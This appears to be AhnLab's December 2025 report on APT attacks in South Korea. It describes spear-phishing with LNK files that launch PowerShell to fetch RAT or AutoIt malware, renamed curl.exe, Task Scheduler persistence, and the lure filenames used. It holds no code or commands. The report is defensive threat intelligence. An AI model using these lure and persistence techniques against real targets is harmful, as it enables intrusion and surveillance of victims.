December 2025 APT Attack Trend Report (South Korea)
Overview
AhnLab monitoring APT (Advanced Persistent Threat) attacks in South Korea using its own infrastructure. This report covers the classification and statistics of APT attacks in South Korea that were identified over the course of one month in December 2025. It also provides an overview of the features of each attack type.
Figure 1. Statistics of APT attacks in South Korea in December 2025
In Korea, most of the identified APT attacks were distributed using the spear phishing method. Notably, attacks using LNK files accounted for the highest proportion in December 2025.
APT Group Targets South Korea
The following are the cases and features of APT attacks in Korea identified in December 2025.
1) Spear Phishing
Spear phishing is a type of phishing attack targeting specific individuals or groups. Unlike general phishing, attackers gather and analyze information about the target through a reconnaissance phase before executing the attack. Attackers use this gathered information to craft phishing emails, making recipients more likely to perceive them as legitimate. Additionally, email spoofing to forge sender addresses is common. Most spear phishing attacks involve malicious attachments or links within the email, prompting users to execute them.
The types of attacks distributed using this technique are as follows.
1.1 Attacks Using LNK Files
Type A
This type executes RAT malware. It is primarily distributed as compressed files alongside legitimate files. The LNK files confirmed to be distributed contain malicious PowerShell commands. They download malware using the DropBox API or Google Drive, or create additional script files and obfuscated RAT malware on the user’s PC, such as in the “%PUBLIC%” directory. The RAT malware ultimately executed performs various malicious actions, such as keylogging and screen capture, according to the attacker’s commands. Confirmed RAT types include XenoRAT and RoKRAT.
The confirmed filenames are as follows.
|
File Name |
|---|
| 20251216 Hyundai International Relations review article(**)Final Submission.lnk |
| lost_items_form.lnk |
| Notice_Submission of North Korean Defector Support Project Results and Balance Refund Guidance.lnk |
| Loan Verification.lnk |
| Baekjegobun-ro_Songpa-gu.lnk |
| Transaction Statement for Mr. Choi**.lnk |
Table 1. Identified filenames
Type B
This type downloads AutoIt malware. When the malicious PowerShell commandin the LNK file is executed, it accesses an external URL and downloads additional files. A key characteristic of this type is that it copies the curl.exe program under a different filename (e.g., WpqNoXz.exe) before executing it. Ultimately, both a legitimate AutoIt program and a malicious AutoIt script are downloaded. The downloaded files are registered in the Task Scheduler to ensure continuous execution. The malicious AutoIt script can perform functions such as executing commands, scanning directories, uploading files, and downloading files.
The confirmed filenames are as follows.
|
File Name |
|---|
| 2025 North Korean Human Rights Youth Academy Lecture Topics.pdf.lnk |
| NordVPN Campaign Overview.pdf.lnk |
| YouTube Campaign Paid Partnership Proposal.docx.lnk |
Table 2. Confirmed filenames
The decoy files used to make it appear as if the user executed a legitimate file are as follows.
Figure 2. Identified decoy file
